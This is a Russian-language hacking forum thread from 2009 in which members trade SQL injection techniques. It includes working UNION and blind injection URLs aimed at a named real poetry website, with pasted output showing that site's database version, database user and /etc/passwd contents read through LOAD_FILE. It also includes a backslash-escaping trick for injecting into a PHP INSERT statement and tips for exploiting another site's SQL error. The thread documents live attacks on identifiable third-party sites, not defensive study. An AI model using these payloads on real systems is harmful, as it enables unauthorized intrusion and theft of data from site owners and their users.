14.06.2009, 01:56
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от Велемир
Если кавычка превращается в хтмл сущность оной,пусть инезаметно для меня,то инжект нельзя провести ?
Если кавчка заменяется html сущностями, то это уже не кавычка и ничего ты ею не сделаешь.
P.S. кстати скрипт бажный.
Слеши как я понял не экранируются, можно их заюзать:
* тут немного не правильно написал, см мой пост ниже.
Код:
mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
к примеру:
$url = \
$email = cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email=(select version()), type=0; -- 1
Получиться:
Код:
mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='\', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email=(select version()), type=0; -- 1', type=0;") or die(mysql_error());
Последний раз редактировалось Grey; 14.06.2009 в 03:07..
|
|
|
14.06.2009, 01:47
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Хз,что за ошибка,но посимвольный работает:
http://www.poetryclub.com.ua/author.php?id=2933+and+ascii(substring((select+ver sion()),1,1))%3E=1/*
Обрати внимание на поле Опублiковано
|
|
|
|
14.06.2009, 01:53
|
|
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами:
10585560
Репутация:
1550
|
|
2 TELO
http://www.poetryclub.com.ua/author.php?id=2933+UNION+SELECT+CONCAT(0x3a,versio n(),database(),user())+LIMIT+1,1--
Database Version: 5.0.27
Database name: poetryclub
User name: vobushka@localhost
http://www.poetryclub.com.ua/author.php?id=2933+UNION+SELECT+LOAD_FILE(0x2f6574 632f706173737764)+LIMIT+1,1--
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0:Charlie &:/root:/bin/csh bla bla bla
Последний раз редактировалось Gorev; 14.06.2009 в 01:57..
|
|
|
|
14.06.2009, 02:36
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами:
10470131
Репутация:
142
|
|
Чет я не догнал тему о слешах.Без них никак? Смотрю на твой пример и ничего не понимаю(кроме селект версион()  |
|
|
|
14.06.2009, 02:52
|
|
Познавший АНТИЧАТ
Регистрация: 10.06.2006
Сообщений: 1,113
С нами:
10483586
Репутация:
5826
|
|
Сообщение от Велемир
Чет я не догнал тему о слешах.Без них никак? Смотрю на твой пример и ничего не понимаю(кроме селект версион()
Ну смотри переменная $ttitle - ей присваиваешь значение '\';
Т.е. слеш.
Код:
mysql_query("INSERT INTO main SET title='$ttitle', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
Получается следующее:
Код:
mysql_query("INSERT INTO main SET title='\', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
Т.е. он экранирует кавычку идущую после него.
Значит она не будет учавствовать в запросе и будет отображаться как текст, до следующей кавычки (в предыдущем примере я ошибся с $email):
Всё между этими кавычками - будет восприниматься как текст и будет значением колонки url.
Код:
mysql_query("INSERT INTO main SET title='\', description='$description', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
Теперь ты можешь присвоить переменной $description значение и никакие кавычки тебе не помешают.
Предположим значение $description = ' , url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- '
В запросе будет следующее:
Код:
mysql_query("INSERT INTO main SET title='\', description=', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- ', url='$url', cat1='$c1', cat2='0', cat3='0', gin=0, gout=0, moder_vote=0, email='$email', type=0;") or die(mysql_error());
Отбросим лишее (то, что будет за комментировано):
Код:
mysql_query("INSERT INTO main SET title='\', description=', url=0, cat1=0, cat2=0, cat3=0,gin=0, gout=0, moder_vote=0, email={СКЛ инъекция}, type=0; -- ") or die(mysql_error());
Далее объясню тебе как юзать такую инъекцию:
1. Или смотришь на то, что добавилось в поле email (если верить названию - оно где то должно отображаться).
2. Или юзаешь more than 1 row (ищи статью Електа).
P.S. А вообще вот тебе две статьи, милый, иди и изучай:
Атака на WEB. Миссия невыполнима - а там находишь "[ Фрагментированная SQL-inj ]"
more than 1 row
Последний раз редактировалось Grey; 14.06.2009 в 15:14..
|
|
|
|
14.06.2009, 11:27
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
на некотором сайте, при подстановки ' выводится следующая ошибка: Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'
подскажите, какая именно это уязвимость, к какой СУБД она относится?
|
|
|
|
14.06.2009, 11:35
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Сообщение от jecka3000
на некотором сайте, при подстановки ' выводится следующая ошибка: Tried to print a stacktrace.unknown(0): /chroot/home/comingso/comingsoon.net/nextra/include/net/nexcess/lib/NexDbUtil.php(183): DB Error: syntax error SELECT user_id, status FROM NEX_ARTICLES WHERE article_id = 1'
подскажите, какая именно это уязвимость, к какой СУБД она относится?
mysql, есть возможность проведения sql инъекции. Преебирай число столбцов (+order+by+...), дальше, если версия не третья, то можно из Бд вытащит данные.
|
|
|
|
14.06.2009, 11:45
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
wildshaman, смотри, вот кажись подобрал, дальше пытаюсь вытащить юзеров, БД ну и т.д. Но сейчас не выодит ни ошибки ни инфу, которую я хотел бы .......
УРЛ скинул в личку, посмотри плиз...)
|
|
|
|
14.06.2009, 11:51
|
|
Постоянный
Регистрация: 12.12.2006
Сообщений: 906
С нами:
10216668
Репутация:
930
|
|
если версия не третья, то можно из Бд вытащит данные.
Если третья, то тоже можно, но немного сложнее.
|
|
|
|
14.06.2009, 12:10
|
|
Постоянный
Регистрация: 16.04.2008
Сообщений: 889
С нами:
9510146
Репутация:
1550
|
|
Да, ошибся, там просто сложнее намного, с тройкой не привык еще работать  |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
